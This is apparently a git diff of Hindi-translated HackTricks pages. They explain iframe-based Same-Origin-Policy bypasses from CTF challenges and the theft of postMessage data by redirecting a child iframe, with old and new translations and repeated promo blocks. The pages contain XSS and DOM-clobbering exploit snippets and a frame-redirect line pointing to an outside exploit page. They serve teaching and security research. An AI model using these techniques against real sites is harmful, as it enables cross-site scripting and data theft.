win?.postMessage(buffer, '*', [buffer.buffer]);
```
और उस **पोस्टमैसेज** को सटीक और **भेजने** के लिए, आपको **आईफ्रेम** बनाए जाने के **बाद** लेकिन जब यह पेयरेंट से डेटा प्राप्त करने के लिए **तैयार** होने के **पहले** ही **`setTimeout`** के मिलीसेकंड के साथ **खेलने** की आवश्यकता होगी।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PRs के माध्यम से [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में सबमिट करें।**
</details>
और सटीक होने के लिए और **पोस्टमैसेज** को **भेजने** के लिए आपको **आईफ्रेम** बनाए जाने के ठीक बाद और डेटा पेयरेंट से डेटा प्राप्त करने के लिए तैयार होने से **पहले** आपको **`setTimeout`** के मिलीसेकंड के साथ खेलने की आवश्यकता होगी।

View file

@ -1,20 +1,20 @@
# Iframes के साथ SOP को बाइपास करना - 1
# Iframes में SOP को छलकरना - 1
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह अनन्य [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>
## SOP-1 में Iframes
इस [**चुनौती**](https://github.com/terjanq/same-origin-xss) के द्वारा बनाई गई है जिसे [**NDevTK**](https://github.com/NDevTK) और [**Terjanq**](https://github.com/terjanq) ने बनाया है, आपको कोड में XSS का शोध करने की आवश्यकता होगी
इस [**चुनौती**](https://github.com/terjanq/same-origin-xss) क [**NDevTK**](https://github.com/NDevTK) और [**Terjanq**](https://github.com/terjanq) द्वारा बनाई गई है, आपको कोड में XSS का शोध करना होगा
```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
@ -25,26 +25,26 @@ renderContainer.innerHTML = data.body;
}
}
```
मुख्य समस्या यह है कि [**मुख्य पृष्ठ**](https://so-xss.terjanq.me) `data.body` को भेजने के लिए DomPurify का उपयोग करता है, इसलिए उस कोड को अपने खुद के html डेटा को भेजने के लिए आपको `e.origin !== window.origin` को **बापास** करना होगा।
मुख्य समस्या यह है कि [**मुख्य पृष्ठ**](https://so-xss.terjanq.me) DomPurify का उपयोग करता है ताकि `data.body` भेज सके, इसलिए उस कोड को अपने खुद के html डेटा भेजने के लिए आपको `e.origin !== window.origin` को **बापास** करना होगा।
चलिए देखते हैं वे कौन सी समाधान सुझाते हैं
चलिए देखते हैं उन्होंने कौन सा समाधान प्रस्तावित किया है
### SOP बापास 1 (e.origin === null)
### SOP बापास 1 (e.origin === null)
जब `//example.org` को एक **sandboxed iframe** में एम्बेड किया जाता है, तो पृष्ठ का **मूल** **`null`** होगा, अर्थात **`window.origin === null`** होगा। इसलिए, `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` के माध्यम से iframe को एम्बेड करके हम **`null` मूल** को **बाध्य** कर सकते हैं
जब `//example.org` को **sandboxed iframe** में समाहित किया जाता है, तो पृष्ठ का **मूल** **`null`** होगा, अर्थात **`window.origin === null`** होगा। इसलिए, `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` के माध्यम से iframe समाहित करके हम **`null` मूल** को **बलपूर्वक कर सकते हैं**
यदि पृष्ठ **एम्बेड किया जा सकता** था तो आप उस सुरक्षा को इस तरीके से बाईपास कर सकते थे (कुकीज़ को `SameSite=None` पर सेट करने की भी आवश्यकता हो सकती है)।
अगर पृष्ठ **embeddable** होता तो आप उस सुरक्षा को उस तरीके से बायपास कर सकते थे (कुकीज भी `SameSite=None` पर सेट करने की आवश्यकता हो सकती है)।
### SOP बापास 2 (window.origin === null)
### SOP बापास 2 (window.origin === null)
कम जाने जाने वाला तथ्य यह है कि जब **sandbox मान `allow-popups` सेट होता है** तो **खोले गए पॉपअप** को **सभी सैंडबॉक्स विशेषताएं अनुरोधित** करेंगी जब तक `allow-popups-to-escape-sandbox` सेट न हो।\
इसलिए, एक **null मूल** से **पॉपअप** खोलने से पॉपअप के अंदर का **`window.origin`** भी **`null`** हो जाएगा।
कम जाना जानकारी है कि जब **sandbox मान `allow-popups` सेट किया जाता है** तो **खुला popup** सभी **sandboxed गुण** को **वारिस्त** करेगा जब तक `allow-popups-to-escape-sandbox` सेट नहीं है।\
इसलिए, **null मूल** से **popup** खोलने से **पॉपअप** के अंदर **`window.origin`** भी **`null`** हो जाएगा।
### चुनौती का समाधान
### चुनौती समाधान
इसलिए, इस चुनौती के लिए, कोई भी एक **iframe** बना सकता है, **पॉपअप** खोल सकता है जो विकल्पी XSS कोड हैंडलर (`/iframe.php`) के पृष्ठ पर, `window.origin === e.origin` क्योंकि दोनों `null` हैं, इसलिए XSS को उपयोग करने वाला एक payload भेजना संभव है
इसलिए, इस चुनौती के लिए, कोई भी **iframe** बना सकता है, **पॉपअप खोल** सकता है वह पृष्ठ जिसमें वंलरेबल XSS कोड हैंडलर (`/iframe.php`) के लिए, क्योंकि `window.origin === e.origin` क्योंकि दोनों `null` हैं, इससे **XSS का शिकार होने वाला एक पेलोड भेजना संभव है**
वह **payload** उपयोगकर्ता को **पहचानकर्ता** प्राप्त करेगा और एक **XSS** को शीर्ष पृष्ठ (पॉपअप खोलने वाला पृष्ठ) को **वापस भेजेगा**, जो **विकल्पी** `/iframe.php` में **स्थान बदलेगा**। पहचानकर्ता जाना जाता है, इसलिए यह मायने नहीं रखता है कि शर्त `window.origin === e.origin` पूरी नहीं होती है (याद रखें, मूल है **iframe** का पॉपअप जिसका **मूल** **`null`** है) क्योंकि `data.identifier === identifier` होता है। फिर, **XSS फिर से ट्रिगर होगा**, इस बार सही मूल में।
वह **पेलोड** उपयोगकर्ता को **पहचान** देगा और एक **XSS** को **वापस शीर्ष पृष्ठ** (पॉपअप खोलने वाला पृष्ठ) पर भेजेगा, **जिसे** **वह** **स्थान बदल देगा** **वंलरेबल** `/iframe.php` पर। क्योंकि पहचान जानी जाती है, इसे मायने नहीं रखता कि शर्त `window.origin === e.origin` पूरी नहीं होती है (ध्यान दें, मूल है **iframe** से **उत्पन्न** **`null`** मूल है) क्योंकि `data.identifier === identifier`। फिर, **XSS फिर से ट्रिगर होगा**, इस बार सही मूल में।
```html
<body>
<script>
@ -83,10 +83,10 @@ document.body.appendChild(f);
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं PEASS या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके।
</details>

View file

@ -1,32 +1,32 @@
# आईफ्रेम्स के साथ SOP को दौर करना - 2
# आईफ्रेम्स के साथ SOP को बाइपास करना - 2
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
</details>
## SOP-2 में आईफ्रेम्स
इस [**चुनौती**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) के [**समाधान**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) में, [**@Strellic\_**](https://twitter.com/Strellic\_) पिछले खंड की एक समान विधि का प्रस्ताव करते हैं। चलो इसे देखते हैं।
इस [**चुनौती**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) के [**समाधान**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) में, [**@Strellic\_**](https://twitter.com/Strellic\_) पिछले खंड की एक समान विधि का प्रस्ताव देते हैं। चलिए इसे जांचते हैं।
इस चुनौती में हमें आक्रमक को इसे **दौर करना** होगा:
इस चुनौती में हमें आक्रमक को यह **बाइपास** करने की आवश्यकता है:
```javascript
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
```
यदि वह ऐसा करता है, तो वह HTML सामग्री के साथ एक **postmessage** भेज सकता है जो **`innerHTML`** के साथ पृष्ठ में लिखा जाएगा बिना स्वचालन के (**XSS**).
अगर वह ऐसा करता है, तो वह **postmessage** भेज सकता है जिसमें HTML सामग्री होगी ज**`innerHTML`** के साथ पेज में लिखी जाएगी बिना सेनिटेशन के (**XSS**).
**पहली जांच** को अनदेखा करने का तरीका है **`window.calc.contentWindow`** को **`undefined`** और **`e.source`** को **`null`** बनाना:
**पहली जाँच** को छलकरने का तरीका यह है कि **`window.calc.contentWindow`** को **`undefined`** और **`e.source`** को **`null`** बनाना है:
* **`window.calc.contentWindow`** वास्तव में **`document.getElementById("calc")`** है। आप **`document.getElementById`** को **`<img name=getElementById />`** के साथ अधिग्रहण कर सकते हैं (ध्यान दें कि Sanitizer API -[यहां](https://wicg.github.io/sanitizer-api/#dom-clobbering)- अपनी डिफ़ॉल्ट स्थिति में DOM clobbering हमलों से सुरक्षा करने के लिए विन्यासित नहीं है)।
* इसलिए, आप **`document.getElementById("calc")`** को **`<img name=getElementById /><div id=calc></div>`** के साथ अधिग्रहण कर सकते हैं। फिर, **`window.calc`** **`undefined`** हो जाएगा।
* अब, हमें **`e.source`** को **`undefined`** या **`null`** होना चाहिए (क्योंकि `==` का उपयोग `===` के बजाय किया जाता है, **`null == undefined`** **`True`** है)। इसे प्राप्त करना "आसान" है। यदि आप एक **iframe** बनाते हैं और उससे **postMessage** भेजते हैं और तत्काल **remove** करते हैं, तो **`e.origin`** **`null`** हो जाएगा। निम्नलिखित कोड की जाच करें
* **`window.calc.contentWindow`** वास्तव में **`document.getElementById("calc")`** है। आप **`document.getElementById`** को **`<img name=getElementById />`** के साथ ओवरराइड कर सकते हैं (ध्यान दें कि सैनिटाइजर एपीआई -[यहाँ](https://wicg.github.io/sanitizer-api/#dom-clobbering)- DOM clobbering हमलों के खिलाफ सुरक्षा के लिए डिफ़ॉल्ट स्थिति में कॉन्फ़िगर नहीं है)।
* इसलिए, आप **`document.getElementById("calc")`** को **`<img name=getElementById /><div id=calc></div>`** के साथ ओवरराइड कर सकते हैं। फिर, **`window.calc`** **`undefined`** हो जाएगा।
* अब, हमें चाहिए कि **`e.source`** **`undefined`** या **`null`** हो (क्योंकि `==` का उपयोग `===` के बजाय किया जाता है, **`null == undefined`** **`True`** है)। इसे प्राप्त करना "आसान" है। यदि आप एक **iframe** बनाते हैं और उससे **postMessage** भेजते हैं और तुरं**remove** कर देते हैं, तो **`e.origin`** **`null`** हो जाएगा। निम्नलिखित कोड की जाच करें
```javascript
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
@ -35,12 +35,12 @@ await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
```
दूसरे चेक को टोकन के बारे में छल ने के लिए **`token`** के साथ मान `null` भेजकर और **`window.token`** को मान **`undefined`** करना होगा:
दूसरी जांच को टोकन के बारे में छलकने के लिए **`token`** को मान `null` के साथ भेजकर और **`window.token`** को मान **`undefined`** करके किया जा सकता है:
* **`null`** मूल पृष्ठों में **`document.cookie`** का पहुंच करने पर त्रुटि होती है, इसलिए **`window.token`** का मान **`undefined`** हो जाएगा.
* **`null`** मूल पृष्ठों में **`document.cookie`** का पहुंच करने पर त्रुटि होती है, इसलिए **`window.token`** का मान **`undefined`** हो जाएगा.
* **`token`** को मान `null` के साथ postMessage के माध्यम से भेजना सरल है।
* **`window.token`** **`document.cookie`** का उपयोग करने वाले **`getCookie`** फ़ंक्शन को कॉल करना है। ध्यान दें कि **`null`** मूल स्थान पृष्ठों में **`document.cookie`** तक पहुंच किसी **त्रुटि** को ट्रिगर करेगा। इससे **`window.token`** का मान **`undefined`** हो जाएगा
[**@terjanq**](https://twitter.com/terjanq) द्वारा अंतिम समाधान [**यहां**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html) है:
[**@terjanq**](https://twitter.com/terjanq) द्वारा अंतिम समाधान [**निम्नलिखित**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html) है:
```html
<html>
<body>
@ -80,10 +80,10 @@ setTimeout(start, 1000);
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -1,24 +1,24 @@
# पोस्टमैसेज संदेशों को चुराना और आईफ्रेम के स्थान को संशोधित करना
# आईफ्रेम की स्थान परिवर्तित करके पोस्टमैसेज चुराना
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PRs के माध्यम से [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में सबमिट करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
## बच्चा आईफ्रेम क स्थानों को बदलना
## बच्चा आईफ्रेम क स्थानों को बदलना
[**इस व्राइटअप**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) के अनुसार, यदि आप एक वेबपेज को आईफ्रेम के रूप में शामिल कर सकते हैं जिसमें X-Frame-Header नहीं है और वह एक और आईफ्रेम को शामिल करता है, तो आप **उस बच्चा आईफ्रेम के स्थान को बदल सकते हैं**।
[**इस व्राइटअप**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) के अनुसार, यदि आप एक वेबपेज को आईफ्रेम कर सकते हैं जिसमें X-फ्रेम-हेडर नहीं है और जिसमें एक और आईफ्रेम है, तो आप **उस बच्चा आईफ्रेम की स्थान को बदल सकते हैं**।
उदाहरण के लिए, यदि abc.com के पास efg.com आईफ्रेम है और abc.com के पास X-Frame हैडर नहीं है, तो मैं एविल.कॉम को ईविल.कॉम के संबंधित आईफ्रेम (बच्चा या माता-पिता) के स्थान को बदलकर इस्तेमाल करके ईविल.कॉम को क्रॉस ऑरिजिन बना सकता हूँ, **`frames.location`**।
उदाहरण के लिए, यदि abc.com के पास efg.com के रूप में आईफ्रेम है और abc.com के पास X-फ्रेम हेडर नहीं है, तो मैं efg.com को evil.com पार-संस्करण में बदल सकता हूँ, **`frames.location`** का उपयोग करके
यह विशेष रूप से पोस्टमैसेज में उपयोगी है क्योंकि यदि कोई पेज संवेदनशील डेटा को एक **वाइल्डकार्ड** का उपयोग करके भेज रहा है जैसे `windowRef.postmessage("","*")`, तो संबंधित आईफ्रेम (बच्चा या माता-पिता) के स्थान को **हमलावर के नियंत्रण में स्थित स्थान** पर बदलकर उस डेटा को चुरा सकते हैं।
यह विशेष रूप से **पोस्टमैसेज** में उपयुक्त है क्योंकि यदि कोई पृष्ठ संवेदनशील डेटा को एक **वाइल्डकार्ड** जैसे `windowRef.postmessage("","*")` का उपयोग करके भेज रहा है, तो संबंधित आईफ्रेम (बच्चा या माता) की स्थान को एक हमलावर नियंत्रित स्थान पर बदलकर उस डेटा को चुरा सकते हैं।
```html
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -39,10 +39,10 @@ window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
